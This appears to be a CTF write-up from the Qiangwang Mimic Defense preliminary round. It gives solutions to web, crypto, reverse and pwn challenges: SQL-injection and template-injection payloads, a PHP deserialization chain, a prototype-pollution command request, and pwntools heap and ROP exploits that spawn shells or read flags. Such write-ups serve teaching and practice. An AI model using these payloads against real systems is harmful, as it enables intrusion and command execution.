The 5th "Qiangwang" (强网) Mimic Defense International Elite Challenge, Preliminary Round: WriteUp By EDISEC

Posted by admin on 2022-11-08 13:15:37 in the CTF section


01

Web

1

popsql

Time-based blind injection using benchmark()

sys.schema_table_statistics sys.x$statement_analysis Fl49ish3re.f1aG123
'password' : f"a'or/**/if((select/**/strcmp(ord(right((select(group_concat(f1aG123))from(Fl49ish3re)),{i})),{s})),1,benchmark(7000000,sha(1)))/**/or'a"


2

ezus

/index.php/tm.php//%a1?source=
This request returns the source code.
Then run the following to get the flag:

    <?php
    class UserAccount
    {
        protected $username;
        protected $password;

        public function __construct($username, $password)
        {
            $this->username = $username;
            $this->password = $password;
            // $this->password = new order("suanve://[email protected]/../../../../../../../Users/su/Downloads/fastify/flag","file://try/pass//php:");
        }
    }

    function object_sleep($str)
    {
        $ob = str_replace(chr(0) . '*' . chr(0), '@[email protected]@[email protected]', $str);
        return $ob;
    }

    function object_weakup($ob)
    {
        $r = str_replace('@[email protected]@[email protected]', chr(0) . '*' . chr(0), $ob);
        return $r;
    }

    class order
    {
        public $f;
        public $hint;

        public function __construct($hint, $f)
        {
            $this->f = $f;
            $this->hint = $hint;
        }

        public function __wakeup()
        {
            //something in hint.php
            // if ($this->hint != "pass" || $this->f != "pass") {
            //     $this->hint = "pass";
            //     $this->f = "pass";
            // }
        }

        public function __destruct()
        {
            if (filter_var($this->hint, FILTER_VALIDATE_URL)) {
                $r = parse_url($this->hint);
                if (!empty($this->f)) {
                    if (strpos($this->f, "try") !== false && strpos($this->f, "pass") !== false) {
                        @include($this->f . '.php');
                    } else {
                        die("try again!");
                    }
                    if (preg_match('/prankhub$/', $r['host'])) {
                        @$out = file_get_contents($this->hint);
                        echo "<br/>" . $out;
                    } else {
                        die("<br/>error");
                    }
                } else {
                    die("try it!");
                }
            } else {
                echo "Invalid URL";
            }
        }
    }

    // @$username = $_POST['username'];
    // @$password = $_POST['password'];

    $username = "@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]";
    $password = '";s:11:"%00*%00password";O:5:"order":2:{s:1:"f";s:21:"file://try/pass//php:";s:4:"hint";s:80:"suanve://[email protected]/../../../../../../../Users/su/Downloads/fastify/flag";}';
    $password = urldecode($password);
    // unserialize($password);
    $a = new UserAccount($username, $password);
    $user = serialize($a);
    echo $user;
    echo "pop:" . object_weakup(object_sleep($user));
    unserialize(object_weakup(object_sleep($user)));

    POST /tm.php HTTP/1.1
    Host: 172.51.243.32
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 232

    [email protected]@[email protected]@@0@[email protected]@@0@[email protected]@@0@[email protected]@@0@[email protected]@@0@[email protected]@@0@[email protected]@&password=";s:11:"%00*%00password";O:5:"order":3:{s:1:"f";s:21:"file://try/pass//php:";s:4:"hint";s:67:"suanve://[email protected]/../../../../../../../f1111444449999.txt";}


3

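没有人比我更懂py (Nobody knows py better than me)

Classic octal-escape bypass. The intended expression:

    ()['__class__']['__mro__'][1]['__subclasses__']()[213]['__init__']['__globals__']['__builtins__']['eval']('__import__("o"+"s").popen("cat /*").read()')

The same expression with every string written as octal escapes:

    data={{()['\137\137\143\154\141\163\163\137\137']['\137\137\155\162\157\137\137'][1]['\137\137\163\165\142\143\154\141\163\163\145\163\137\137']()[213]['\137\137\151\156\151\164\137\137']['\137\137\147\154\157\142\141\154\163\137\137']['\137\137\142\165\151\154\164\151\156\163\137\137']['\145\166\141\154']('\137\137\151\155\160\157\162\164\137\137\50\42\157\42\53\42\163\42\51\56\160\157\160\145\156\50\42\143\141\164\40\57\52\42\51\56\162\145\141\144\50\51')}}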


4

WHOYOUARE

Pollute the parameters to execute arbitrary commands:

    POST /user HTTP/1.1
    Host: 172.51.243.13:3000
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/json
    Content-Length: 121

    {"user":["{"constructor":{"prototype":{"2":"cat /flag"}},"username":"admin","command":["-c","-i"]}"]}


02

Misc

1

Welcome


2

babymisc

Guess the number:

    from pwn import *
    # context.log_level = 'debug'
    while True:
        io = remote("172.51.243.74",9999)
        io.recvline()
        io.recvline()
        io.recvline()
        io.sendline("Y")
        #
        low = 0
        up = 999999
        # guess = 454346
        for i in range(15):
            guess = round((int(up)+int(low))/2)
            s = b""
            try:
                s = io.recvuntil(b"Please enter a number:")
            except:
                io.interactive()
            print(b"[+]"+s)
            if b"Please e" not in s:
                print(s)
                break

            # s = io.recvuntil(b"Please enter a number:")
            print(f"[*] GET {s}")
            # Narrow the interval according to the server's hint
            if "low" in str(s):
                low = guess
                guess = int ((up - low) / 2) + low
                # print(low)
            elif "up" in str(s):
                up = guess
                guess = int ((up - low) / 2) + low
                # print(up)
            else:
                guess = int ((up - low) / 2) + low
            guess = int(guess)
            print(f"[*] SEND {guess}")
            io.sendline(f"{guess}")
            if "lost" in str(s):
                break
            elif "flag" in str(s):
                print("flag!!!!!")
                break


03

Crypto

1

weakrandom

Brute-force the sha256 to pass the first check. Then, after running the script many times, we found that at certain counts a fixed value 670760960 appears; just use that fixed value to collide.

    from pwn import *
    import hashlib
    import os
    context.log_level = 'debug'
    p = remote('172.51.243.182', 9998)

    class WeakRandom:
        def __init__(self,seed,n,s):
            self.x = seed
            self.n = n
            self.s = s
        def next(self):
            x = int((self.x ** 2) // (10 ** (self.s // 2))) % self.n
            self.x = x
            high = (int(hashlib.sha256(str(x).encode()).hexdigest(),16) >> 16) & (2 ** 16 - 1)
            low = x & (2 ** 16 - 1)
            result = high << 16 | low
            return result

    # Proof of work: find the 4-character prefix XXXX
    String = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz"
    p.recvuntil(b'sha256(XXXX+')
    a = p.recvuntil(b') == ')[:-5]
    b = p.recvline().strip().decode()
    for i in String:
        for j in String:
            for k in String:
                for l in String:
                    s = (i+j+k+l).encode() + a
                    sha = hashlib.sha256(s).hexdigest()
                    if sha == b:
                        p.recvuntil(b'Give me XXXX:\n')
                        p.sendline(s[:4])

    n = 10000000000
    s = 4
    seed = os.urandom(4)
    seed = int.from_bytes(seed,byteorder = "big")
    r = WeakRandom(seed,n,s)
    while True:
        p.recvuntil(b'Please your guess : ')
        #p.sendline(str(r.next()).encode('ascii'))
        p.sendline(b'670760960')
    #p.interactive()
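Why that constant shows up, as an added example that is not part of the original write-up: with the script's parameters n = 10000000000 and s = 4, state 0 maps to itself, and the output computed from state 0 is exactly 670760960. The helper names (step, output, find_cycle, fixed_points, collapsed_fraction) are introduced here for illustration, and the sample seeds are constructed.

```python
import hashlib

# Parameters copied from the write-up's solver script.
N = 10_000_000_000
S = 4
OBSERVED_CONSTANT = 670760960  # the fixed value reported in the write-up


def step(x, n=N, s=S):
    """State update used by WeakRandom.next(): square, drop low digits, reduce."""
    return (x * x // 10 ** (s // 2)) % n


def output(x):
    """Value WeakRandom.next() returns once its internal state is x."""
    digest = int(hashlib.sha256(str(x).encode()).hexdigest(), 16)
    high = (digest >> 16) & 0xFFFF
    low = x & 0xFFFF
    return high << 16 | low


def find_cycle(seed, limit=2_000_000):
    """Follow the state sequence from seed.

    Returns (tail_length, cycle): how many states are visited before the
    sequence starts repeating, and the states that make up the repeating cycle.
    """
    first_seen = {}
    order = []
    x = seed
    while x not in first_seen:
        if len(order) >= limit:
            raise RuntimeError("no cycle found within limit")
        first_seen[x] = len(order)
        order.append(x)
        x = step(x)
    start = first_seen[x]
    return start, order[start:]


def fixed_points(upper):
    """All states below upper that map to themselves."""
    return [x for x in range(upper) if step(x) == x]


def collapsed_fraction(seeds):
    """Fraction of seeds whose sequence ends stuck in state 0."""
    hits = sum(1 for seed in seeds if find_cycle(seed)[1] == [0])
    return hits / len(seeds)


if __name__ == "__main__":
    import random

    # Constructed sample seeds, 32 bits wide like os.urandom(4) in the script.
    rng = random.Random(2022)
    seeds = [rng.getrandbits(32) for _ in range(20)]
    print("output at state 0:", output(0))
    print("fixed points below 1000:", fixed_points(1000))
    print("fraction of sample seeds stuck at 0:", collapsed_fraction(seeds))
    for seed in seeds[:5]:
        tail, cycle = find_cycle(seed)
        print(seed, "tail", tail, "cycle length", len(cycle))
```

Any state with three or more trailing decimal zeros gains zeros on every step and reaches 0, which is why the generator can get stuck on one output; a generator meant to be unpredictable should come from a CSPRNG such as Python's secrets module instead.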

04

Re

1

windows_call

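Table-lookup AES + function hooking. Approach: the two md5 calls at the start check that the input consists of uppercase letters.

The program then splits the content inside flag{} into two parts:

The first part is only the first 8 bytes.

The second part is the remaining bytes.

The program converts the second part into hexadecimal data and performs some encryption operations on the first part; finally, the two parts are XORed together before entering AES encryption.

sub_402706 is the main logic function of the AES encryption. Its parameter a1 is split into four parts, each holding 256 bytes of data, so we guess this is table-lookup AES. At this point the main logic of the program is fully clear. Approach for the decryption script: first solve for the first part of the data: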

    from z3 import *
    x = BitVec("x",16)
    y = BitVec("y",16)
    sol = Solver()

    def xpan(n):
        if n < 0:
            return n+0x100
        else:
            return n

    md5_init = x ^ y
    v25 = (x ^ y) & 0xff
    MD5Final = md5_init >> 8

    v38 = [0] * 16
    for v23 in range(16):
        v38[v23] = ((MD5Final + v23) & 0xff) ^ ((v25 + v23) & 0xff)

    MD5Update = 0
    for v27 in range(16):
        v29 = v38[v27] ^ xpan(v27 - 64);
        MD5Update = (MD5Update + v29) & 0xffff

    sol.add((x & 0xff00) >= 0xc800)
    sol.add((x & 0xff00) <= 0xd000)
    sol.add((y & 0xff00) >= 0xc500)
    sol.add((y & 0xff00) <= 0xd000)
    sol.add((y - x) & 0xffff == 0x2B8)
    sol.add(y & 0xff == 0xA0)
    sol.add((x & 0xFF00) < 0xCA00)
    sol.add(MD5Update == 0x8A8)
    # 0xc9e8 0xcca0
    assert sol.check() == sat
    print(hex(sol.model()[x].as_long()),end = " ")
    print(hex(sol.model()[y].as_long()))

Result: 0xc9e8 0xcca0

Next, perform the AES decryption and the XOR:

    qqq = [0x4D, 0x4F, 0x4D, 0x43, 0x45, 0x47, 0x45, 0x43, 0x5D, 0x5F, 0x5D, 0x43, 0x45, 0x47, 0x45, 0x43]
    # ppp = [0xC6, 0xD7, 0x19, 0x8E, 0x95, 0xEB, 0x77, 0x58, 0x24, 0x50, 0x9A, 0x0D, 0xBF, 0x15, 0x4A, 0xFF]

    from Crypto.Cipher import AES
    from struct import *
    cip_list = [0x84,0x37,0xa0,0xf3,0xec,0x36,0x34,0xfc,0x94,0xa2,0x38,0x6f,0x3f,0x34,0x7e,0x7c]

    cip = b""
    for i in cip_list:
        cip += pack("B", i)
    key = b""
    key_list = [0x8D, 0x8E, 0x8F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x95, 0x96, 0x97, 0x88, 0x89, 0x8A, 0x8B, 0x8C]
    for i in key_list:
        key += pack("B", i)
    print("cip => ", cip)
    print("key => ",key)

    Set_AES = AES.new(key,AES.MODE_ECB)
    # m = Set_AES.encrypt(cip)
    m = Set_AES.decrypt(cip)
    # print(m)
    ans = 0
    for i in m:
        print(((hex(i ^ qqq[ans])[2:]).rjust(2,"0")).upper(),end="")
        ans += 1
    print()

The same script with the first part prepended, printing the full flag:

    qqq = [0x4D, 0x4F, 0x4D, 0x43, 0x45, 0x47, 0x45, 0x43, 0x5D, 0x5F, 0x5D, 0x43, 0x45, 0x47, 0x45, 0x43]
    # ppp = [0xC6, 0xD7, 0x19, 0x8E, 0x95, 0xEB, 0x77, 0x58, 0x24, 0x50, 0x9A, 0x0D, 0xBF, 0x15, 0x4A, 0xFF]

    from Crypto.Cipher import AES
    from struct import *
    cip_list = [0x84,0x37,0xa0,0xf3,0xec,0x36,0x34,0xfc,0x94,0xa2,0x38,0x6f,0x3f,0x34,0x7e,0x7c]

    cip = b""
    for i in cip_list:
        cip += pack("B", i)
    key = b""
    key_list = [0x8D, 0x8E, 0x8F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x95, 0x96, 0x97, 0x88, 0x89, 0x8A, 0x8B, 0x8C]
    for i in key_list:
        key += pack("B", i)
    print("cip => ", cip)
    print("key => ",key)

    Set_AES = AES.new(key,AES.MODE_ECB)
    # m = Set_AES.encrypt(cip)
    m = Set_AES.decrypt(cip)
    # print(m)
    ans = 0
    print("flag{E8C9A0CC",end = "")
    for i in m:
        print(((hex(i ^ qqq[ans])[2:]).rjust(2,"0")).upper(),end="")
        ans += 1
    print("}")

The flag is: flag{E8C9A0CC8B9854CDD0AC321B790FC74EFA520FBC}

2

comeongo

Go reverse engineering, base58 encoding.

This is the first check. Debugging shows that it is base58 encoding; the decoded result is the first 8 characters of name and the first 8 characters of passwd.

The second check: the main_io_read function shifts the letters by 12 (note that this is not a Caesar cipher), and the result is then base64-encoded.

After decoding and shifting back, we get the values of Name[8] ~ Name[11] and passwd[8] ~ passwd[11]. Then comes the third check.

These two functions constrain the final characters; through debugging we find that the final Name and passwd are:

    name = "[email protected]"
    passwd = "G3tItEzForRevG0!"

Convert to md5:

    name = "[email protected]"
    passwd = "G3tItEzForRevG0!"
    import hashlib

    str = "flag{" + name + passwd + "}"
    hl = hashlib.md5()
    hl.update(str.encode(encoding='utf-8'))
    ttt = hl.hexdigest()
    print(str)
    print(ttt)

The flag is:

6470d669e15349795c646c9549ab2f98

05

Pwn

1

bfbf

There is an out-of-bounds array access, which allows reading addresses on the stack and overwriting the return address for ROP.

I don't know why there was no way to get a shell on this challenge. Also, because there is a sandbox that does not allow fd > 1, consider close(0) and then read the flag using fd = 0.

    #!/usr/bin/env python
    #coding=utf-8
    from pwn import *
    context(arch = 'amd64',os = 'linux',log_level = 'debug')
    elf = ELF('pwn')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
    DEBUG = 0
    if DEBUG:
        #libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")
        #ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so")
        #p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})
        p = process('./pwn')
    else:
        ip = '172.51.243.161'
        port = 9999
        libc = ELF("./libc.so.6")
        p = remote(ip, port)

    def debug(info="b main"):
        #gdb.attach(p, info)
        #gdb.attach(p, "b *$rebase(0x17e3)")
        gdb.attach(p, "b *$rebase(0x18cd)")

    p.recvuntil(b'BF_PARSER>>\n')
    payload = b'>'*0x238 + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.'
    payload += b'<'*0x25 + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.'
    payload += b'<'*5 + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>'
    for i in range(28):
        payload += b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>'
    #debug()
    p.send(payload)
    sleep(0.5)
    leak = u64(p.recv(6).ljust(8, b'\x00')) - 0x24083
    log.info("libc_base==>0x%x" %leak)
    pie = u64(p.recv(6).ljust(8, b'\x00')) - 0x1955
    log.info("pie==>0x%x" %pie)
    pop_rdi = 0x0000000000023b6a + leak
    pop_rsi = 0x000000000002601f + leak
    pop_rdx = 0x0000000000142c92 + leak
    ret = 0x0000000000022679 + leak
    read = leak + libc.sym['read']
    bss = 0x0000000000008060 + pie
    open = libc.sym['open'] + leak
    close = leak + libc.sym['close']
    write = leak + libc.sym['write']

    # read the path into bss, close(0), open (gets fd 0), read, write
    payload2 = p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(8) + p64(read)
    payload2 += p64(pop_rdi) + p64(0) + p64(close)
    payload2 += p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(open)
    payload2 += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(50) + p64(read)
    payload2 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(50) + p64(write)
    p.send(payload2)
    sleep(0.5)
    p.send(b'./flag\x00\x00')
    p.interactive()

2

webheap_revenge

    #coding:utf-8
    from pwn import *
    from ctypes import CDLL
    context.log_level='debug'
    elfelf='./webheap_revenge'
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text='''
      b * $rebase(0x3DE8)
      b * $rebase(0x3CE0)
      '''

    if len(sys.argv)==1 :
        io=process(elfelf)
        gdb_open=1
        libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    elif sys.argv[1]=='2' :
        io=process(elfelf)
        gdb_open=0
        libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
        io=remote('172.51.243.88',9999)
        gdb_open=0
        libc=ELF('./libc-2.27.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]

    def gdb_attach(io,a):
        if gdb_open==1 :
            gdb.attach(io,a)

    def build_data(a1, a2, a3,data2):
        data = "\xb9\x80\x05"
        data += "\x86" + p32(a1)
        data += "\x82" + p32(a2)
        data += "\x82" + p32(a3)
        data += "\xbd\x83" + p64(len(data2))+data2
        data += '\x80\x05'
        io.sendlineafter("Packet length: ",str(len(data)))
        io.sendafter('Content: ',data)

    def add(a,b):
        build_data(0,a,b,'aaaa')

    def show(a):
        build_data(1,a,0,'aaaa')

    def delete(a):
        build_data(2,a,0,'aaaa')

    def edit(a,b):
        build_data(3,a,0,b)

    add(0,0x4f0)
    add(1,0x100)
    add(2,0x100)
    add(3,0x100)
    delete(0)
    add(0,0x4f0)
    show(0)
    libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-96-0x10
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/sh\x00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    delete(3)
    delete(2)
    edit(1,'a'*0x108+p64(0x111)+p64(free_hook_addr))
    add(2,0x100)
    add(3,0x100)
    edit(2,'/bin/sh\x00')
    edit(3,p64(system_addr))
    delete(2)

    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    gdb_attach(io,gdb_text)
    io.interactive()

3

webheap

    #coding:utf-8
    from pwn import *
    from ctypes import CDLL
    context.log_level='debug'
    elfelf='./webheap'
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text='''
      b * $rebase(0x3DE8)
      b * $rebase(0x3CE0)
      '''

    if len(sys.argv)==1 :
        io=process(elfelf)
        gdb_open=1
        libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    elif sys.argv[1]=='2' :
        io=process(elfelf)
        gdb_open=0
        libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
        io=remote('172.51.243.210',9999)
        gdb_open=0
        libc=ELF('./libc-2.27.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]

    def gdb_attach(io,a):
        if gdb_open==1 :
            gdb.attach(io,a)

    def build_data(a1, a2, a3,data2=b""):
        data = "\xb9\x80\x05"
        data += "\x86" + p32(a1)
        data += "\x82" + p32(a2)
        data += "\x82" + p32(a3)
        data += "\xbd\x83" + p64(len(data2))+data2
        data += '\x80\x05'
        io.sendlineafter("Packet length: ",str(len(data)))
        io.sendafter('Content: ',data)

    def add(a,b):
        build_data(0,a,b,'aaaa')

    def show(a):
        build_data(1,a,0,'aaaa')

    def delete(a):
        build_data(2,a,0,'aaaa')

    def edit(a,b):
        build_data(3,a,0,b)

    add(0,0x500)
    add(1,0x100)
    delete(0)
    show(0)
    libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-96-0x10
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/sh\x00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']

    delete(1)
    edit(1,'\x00'*0x10)
    delete(1)
    edit(1,p64(free_hook_addr))
    add(2,0x100)
    add(3,0x100)
    edit(2,'/bin/sh\x00')
    edit(3,p64(system_addr))
    delete(2)
    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    gdb_attach(io,gdb_text)
    io.interactive()

4

store

    #coding:utf-8
    import sys
    from pwn import *
    from ctypes import CDLL
    context.log_level='debug'
    elfelf='./store'
    #context.arch='amd64'
    while True :
        # try :
        elf=ELF(elfelf)
        context.arch=elf.arch
        gdb_text='''
          telescope $rebase(0x202040) 16
          b mprotect
          '''

        if len(sys.argv)==1 :
            clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
            io=process(elfelf)
            gdb_open=1
            # io=process(['./'],env={'LD_PRELOAD':'./'})
            clibc.srand(clibc.time(0))
            libc=ELF('./libc-2.31.so')
            # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
            one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
        else :
            clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
            io=remote('172.51.243.98',9999)
            gdb_open=0
            clibc.srand(clibc.time(0))
            libc=ELF('./libc-2.31.so')
            # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
            one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]

        def gdb_attach(io,a):
            if gdb_open==1 :
                gdb.attach(io,a)

        def choice(a):
            io.sendlineafter('choice: ',str(a))

        def add(a,b,c):
            choice(1)
            io.sendlineafter('Size: ',str(a))
            io.sendafter('Content: \n',b)
            io.sendafter('Remark: \n',c)

        def add_no(a):
            choice(1)
            io.sendlineafter('Size: ',str(a))

        def edit(a,b,c):
            choice(3)
            io.sendlineafter('Index: ',str(a))
            io.sendafter('Content: \n',b)
            io.sendafter('Remark: \n',c)

        def show(a):
            choice(4)
            io.sendlineafter('Index: ',str(a))

        def delete(a):
            choice(2)
            io.sendlineafter('Index: ',str(a))

        add(0x720,'aaaa','aaaa')
        add(0x710,'aaaa','aaaa')
        delete(0)
        delete(1)
        show(0)
        libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-96-0x10
        libc.address=libc_base
        bin_sh_addr=libc.search('/bin/sh\x00').next()
        system_addr=libc.sym['system']
        free_hook_addr=libc.sym['__free_hook']
        mprotect_addr = libc.sym['mprotect']
        _IO_list_all = libc.sym['_IO_list_all']
        show(1)
        io.recvuntil('Content: \n')
        heap_base=u64(io.recv(6)+'\x00\x00')
        magic = libc_base + 0x0000000000157d8a
        '''
        mov rbp,QWORD PTR [rdi+0x48]
        mov rax,QWORD PTR [rbp+0x18]
        lea r13,[rbp+0x10]
        mov DWORD PTR [rbp+0x10],0x0
        mov rdi,r13
        call QWORD PTR [rax+0x28]
        '''
        _IO_str_jumps = libc.sym['_IO_file_jumps']+0xc0
        _IO_cookie_jumps = libc.sym['_IO_file_jumps']-0xa80
        fs_base = libc_base +0x1f35c0
        leave_ret = libc_base + 0x000000000005aa48
        add30_rsp_pop_rbx = libc_base + 0x000000000011177d
        pop_rdi = libc_base + 0x0000000000026b72
        pop_rsi = libc_base + 0x0000000000027529
        pop_rdx_rbx = libc_base + 0x0000000000162866
        main_arena = libc_base + 0x1f2cc0 - 0x60
        heap_base=heap_base-0x290

        IO_address=heap_base+0x290
        IO_FILE = '\x00'*8
        IO_FILE += p64(heap_base + 0x10) # buf_base
        IO_FILE += p64(heap_base + 0x10 + 0x700) # buf_end
        IO_FILE += p64(0)
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x08 + p64(IO_address + 0xE0) #chain
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x40
        IO_FILE += '\x00'*8 + p64(_IO_str_jumps)

        IO_FILE += '\x00'*0x20 + p64(0) + p64(0xFFFFFFFF) + '\x00'*8
        IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x10) # buf_base
        IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x10 + 270) # buf_end
        IO_FILE += p64(0)
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x08 + p64(IO_address + 0xE0*2) #chain
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x40
        IO_FILE += '\x00'*8 + p64(_IO_str_jumps)

        IO_FILE += '\x00'*0x20 + p64(0) + p64(0xFFFFFFFF) + '\x00'*8
        IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x90 + 0x40 + 0x10) # buf_base
        IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x90 + 0x40 + 0x10 + 14) # buf_end
        IO_FILE += p64(0)
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x08 + p64(IO_address + 0xE0*3) #chain
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x40
        IO_FILE += '\x00'*8 + p64(_IO_str_jumps)

        IO_FILE += '\x00'*0x20 + p64(0) + p64(0xFFFFFFFF) + '\x00'*8
        IO_FILE += p64(0) # buf_base
        IO_FILE += p64(0) # buf_end
        IO_FILE += p64(0)
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x08 + p64(0) #chain
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x10
        IO_FILE += '\x00'*0x40
        IO_FILE += '\x00'*8 + p64(_IO_cookie_jumps + 0x60)
        pay1=IO_FILE
        rol = lambda val, r_bits, max_bits: (val << r_bits%max_bits) & (2**max_bits-1) | ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
        R = rol((magic), 0x11, 64)
        orw_address = IO_address + 0xE0*4 + 0x20 + 0x90 + 0x40 + 0x10 + 0x20 + 0x10
        IO_FILE += p64(orw_address) + p64(0) + p64(R) + p64(0)
        IO_FILE += p64(0) + p64(0x21)
        IO_FILE += '\x03\x00'*0x10 + '\x00\x00'*0x30
        IO_FILE += '\x00'*0x8*0x7
        IO_FILE += p64(fs_base+0x30)
        IO_FILE += (p64(0) + p64(0x21))*4
        IO_FILE += '\x00'*0x28 + p64(leave_ret) +'\x00'*0x18 + p64(orw_address + 0x50) + '\x00'*0x8 + p64(add30_rsp_pop_rbx) + p64(0) + p64(orw_address) + p64(0)
        IO_FILE += '\x00'*0x20 + p64(libc_base+0x0000000000032b5a)+p64(IO_address+0x740)
        pay = p64(pop_rdi) + p64(heap_base) + p64(pop_rsi) + p64(0xF000) + p64(pop_rdx_rbx) + p64(7) + p64(0)
        pay += p64(mprotect_addr) + p64(orw_address + 0xE0+0x1b0+0x48)
        pay += asm('''
        mov rax, 0xc0
        mov rbx, 0x500000
        mov rcx, 0x5000
        mov rdx, 3
        mov rsi, 1048610
        xor rdi, rdi
        xor rbp, rbp
        int 0x80

        mov rsp, 0x500a00

        mov rax, 5
        push 0x2e
        mov rbx, rsp
        xor rcx, rcx
        int 0x80

        mov rbx, rax
        mov rax, 0x8d
        mov rcx, rsp
        mov rdx, 0x1337
        int 0x80

        add rcx, 126

        mov rdi, rax
        mov rsi, rsp
        mov rdx, 0x100
        xor rax, rax
        syscall

        mov rdi, 1
        mov rax, 1
        syscall

        mov rdi, 0
        mov rsi, 0x500c00
        mov rdx, 0x100
        xor rax, rax
        syscall

        mov rax, 5
        mov rbx, 0x500c00
        xor rcx, rcx
        xor rdx, rdx
        int 0x80

        mov rdi, rax
        mov rsi, rsp
        mov rdx, 0x100
        xor rax, rax
        syscall

        mov rdi, 1
        mov rax, 1
        syscall
        ''')
        payload = p64(0)*3
        payload += p64(_IO_list_all - 0x20)
        payload += IO_FILE

        add_no(0x720)
        add_no(0x710)
        delete(0)
        add_no(0xff0)
        edit(0,payload,pay.ljust(0x100))
        delete(1)
        add_no(0xff0)
        add_no(0x710)
        choice(5)
        # the flag file name starts with 'f1ag'; read the rest and send it back
        io.recvuntil('f1ag')
        flag_name='f1ag'+io.recvuntil('\x00')
        io.send(flag_name)

        success('libc_base:'+hex(libc_base))
        success('heap_base:'+hex(heap_base))
        gdb_attach(io,gdb_text)
        io.interactive()
        # except Exception as e:
        #     io.close()
        #     continue
        # else:
        #     continue

